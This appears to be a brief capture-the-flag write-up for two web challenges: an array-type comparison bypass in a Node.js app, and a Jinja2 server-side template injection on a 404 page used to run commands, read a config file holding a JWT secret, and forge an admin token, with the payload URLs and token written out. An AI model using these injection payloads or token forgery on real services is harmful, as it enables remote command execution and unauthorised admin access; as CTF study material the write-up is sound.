SuSec CTF write-up

 

2018년 @Yeouido Hangang Park, Seoul, Korea

 

 Sorry for my bad English foreigners lol :0

Web

web0

 

 

 

 We can get the source which use nodejs express engine. There's some mechanism which compare 'first' and 'second' in post method. As send Array in 'first' and 'second', you can get the flag!

 

 

 

 

Microservice

 

 

 We can access to very simple web service. You can Login, get Flag, and change the Theme of the service. After many tries in JWT Token Attack, I found the SSTI at the 404 page. 

 

 

 

 As soon as I found this, I really screamed. for real. It was a waste of time to try to attack JWT Authentication. Just keep going on trying SSTI.

 

 

 

[*] url : http://66.172.11.208:5000/{{config.__class__.__init__.__globals__['os'].popen('ls -al').read()}}

 

Okay, we can use ssti to run the command. 

 

 

 

[*] http://66.172.11.208:5000/{{config.__class__.__init__.__globals__['os'].popen('cat config.json').read()}}

 

I got the secret key of this microservice. Just apply in your jwt token as admin privilige. 

 

 

 

[*] payload : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQyNzkxMjAsIm5iZiI6MTU4NDI3OTEyMCwianRpIjoiNzEwZTJiMjQtZjUzYy00NmQ1LWFjMTgtMTMwODUyNDllNWNhIiwiaWRlbnRpdHkiOiJhZG1pbiIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyJ9.s3ppGGNMSIQc4HBbhBFb5TjxdBBqVAo0jKD_nhH8RBY

 

 

 

haha we got the flag !!